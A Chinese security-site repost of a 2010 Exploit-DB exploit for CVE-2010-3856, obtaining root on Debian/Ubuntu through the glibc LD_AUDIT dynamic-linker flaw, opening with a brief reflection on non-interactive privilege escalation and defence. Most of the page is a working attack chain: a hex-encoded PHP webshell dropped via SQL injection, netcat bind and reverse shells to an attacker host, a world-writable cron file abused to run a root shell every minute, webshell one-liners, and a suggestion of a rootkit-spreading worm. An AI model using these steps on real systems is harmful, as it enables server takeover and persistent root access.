Linux非交互环境下本地提权思路与反思 linux localroot exploit

在iptables限制非常严格的时候，无法走icmp udp tcp的bind shell或connect back shell，又需要本地提权，root了之后关闭iptables，看看能否绕过访问控制手段（当然了，如果别人是硬件的防火墙，下文解决不了问题）。在这一场景下，可以考虑参考下文的非交互式本地提权的方法，或许还有其他linux localroot exploit也能实现，实战出真知。另外有些时候不一定非得root的，nobody，非交互也能做非常多的事。作为防御一方，面对这种场景，我们是否得反思1、防御手段要与被防御系统分离，即使成功root了，依然难以快速渗透2、我们对localroot是否有足够的事前的免疫能力，事中的发现能力及事后的定损取证能力？
Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root# Exploit Title: Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root
# Date:   24-10-2010
# Author:   jmit
# Mail:   fhausberger[at]gmail[dot]com
# Tested on:   Debian 5.0.6
# CVE:   CVE-2010-3856--------------
| DISCLAIMER |
--------------# IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES （INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION） HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT （INCLUDING NEGLIGENCE OR OTHERWISE）
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.---------
| ABOUT |
---------Debian/Ubuntu remote root exploitation example （GNU dynamic linker DSO vuln）.
See （http://www.exploit-db.com/exploits/15304/）. Should work on other linux
distros too.--------------
| BACKGROUND |
--------------Typically it isn"t possible to use a suidshell or modify /etc/passwd directly after
webshell access （user nobody） to gain root access. But with the DSO vuln we can
launch commands as root and we can create a socket and connect to the user or setup
a bindshell.-----------
| EXPLOIT |
-----------After you have found a SQL-Injection vuln you can create a php backdoor. This is typically
possible with select into dumpfile/outfile statement. The values are a simple
<？ passthru（$_GET["c"]）; ？> backdoor.---
DROP TABLE IF EXISTS `fm`;
CREATE TABLE `fm` （
`fm` longblob
） TYPE=MyISAM;
insert into fm （fm） values （0x3c3f20706173737468727528245f4745545b2763275d293b203f3e）;
select fm from fm into dumpfile "/opt/lampp/htdocs/xampp_backup.php";
drop table fm;
flush logs;
---Now you can connect to the server and create a connection with telnet, nc, write
binary with perl -e " print "x41x42x43x44"", echo -en "x41x42x43x44", ...
If direct shell access isn"t possible you can use phpcode to create your own
binary with php fwrite:---
<？php $File = "/tmp/nc";
$Handle = fopen（$File, "w"）;
$Data = "x41x42x43x44";
fwrite（$Handle, $Data）;
fclose（$Handle）; ？>
---Now use Bind-Shell: http://victimip/xampp_backup.php？c=nc -l -p 9999 -e /bin/bash
Reverse-Shell: http://victimip/xampp_backup.php？c=/bin/nc attackerip 9999 | /bin/bashin your webbrowser and connect to your shell$ nc victimip 9999
id
uid=65534（nobody） gid=65534（nogroup） groups=65534（nogroup）---Now lets exploit the DSO vuln. You need umask 0 for correct
rw-rw-rw creation of exploit /etc/cron.d/exploit$ umask 0This is the shellscript for the cron.d entry.Bind-Shell: $ echo -e "/bin/nc -l -p 79 -e /bin/bash" > /tmp/exploit.sh
Reverse-Shell: $ echo -e "/bin/nc localhost 8888 | /bin/bash" > /tmp/exploit.shNow make your shellscript executable for cron:$ chmod u+x /tmp/exploit.shCreate rw-rw-rw file in cron directory using the setuid ping program:$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" pingLaunch every minute a suid root shell$ echo -e "*/1 * * * * root /tmp/exploit.sh" > /etc/cron.d/exploitNow you have a root shell every minute.$ nc attackerip 79
id
uid=0（root） gid=0（root） groups=0（root）-------------------
| EXPLOIT oneline |
-------------------echo -e "/bin/nc -l -p 79 -e /bin/bash" > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e "*/1 * * * * root /tmp/exploit.sh" > /etc/cron.d/exploit$ nc attackerip 79
id
uid=0（root） gid=0（root） groups=0（root）------------------------------
| EXPLOIT from webshell only |
------------------------------http://victimip/xampp_backup.php？c=echo -e "/bin/nc -l -p 79 -e /bin/bash" > /tmp/exploit.sh
http://victimip/xampp_backup.php？c=/bin/chmod 0744 /tmp/exploit.sh
http://victimip/xampp_backup.php？c=umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
http://victimip/xampp_backup.php？c=echo -e "*/1 * * * * root /tmp/exploit.sh" > /etc/cron.d/exploit$ nc attackerip 79
id
uid=0（root） gid=0（root） groups=0（root）---------------------------------
| EXPLOIT from webshell oneline |
---------------------------------http://victimip/xampp_backup.php？c=echo -e "/bin/nc -l -p 79 -e /bin/bash" > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e "*/1 * * * * root /tmp/exploit.sh" > /etc/cron.d/exploit$ nc attackerip 79
id
uid=0（root） gid=0（root） groups=0（root）---------
| IDEAS |
---------Looks like a wormable bug. The urlobfuscated （IDS/IPS） worm search for SQLI/BSQLI bugs or remote code execution bugs.
Then the worm injects the evil url and do the same for other ips. It installs a rootkit-bot and the game is over.? Offensive Security 2010Webkit SVG越界数组拒绝服务漏洞Cisco IOS拒绝服务和绕过安全限制漏洞相关资讯 Linux安全

发现针对 Linux 服务器和代码库的（11/08/2015 09:11:50）
Linux安全与优化（12/05/2014 17:04:31）
加强 Linux 桌面安全（08/15/2014 11:36:10）

牢记这七点让你的Linux服务器变得（08/12/2015 15:39:07）
树大招风，Linux的安全威胁正在不（08/24/2014 21:44:47）
GNU/Linux安全基线与加固（07/22/2014 13:51:21）

本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任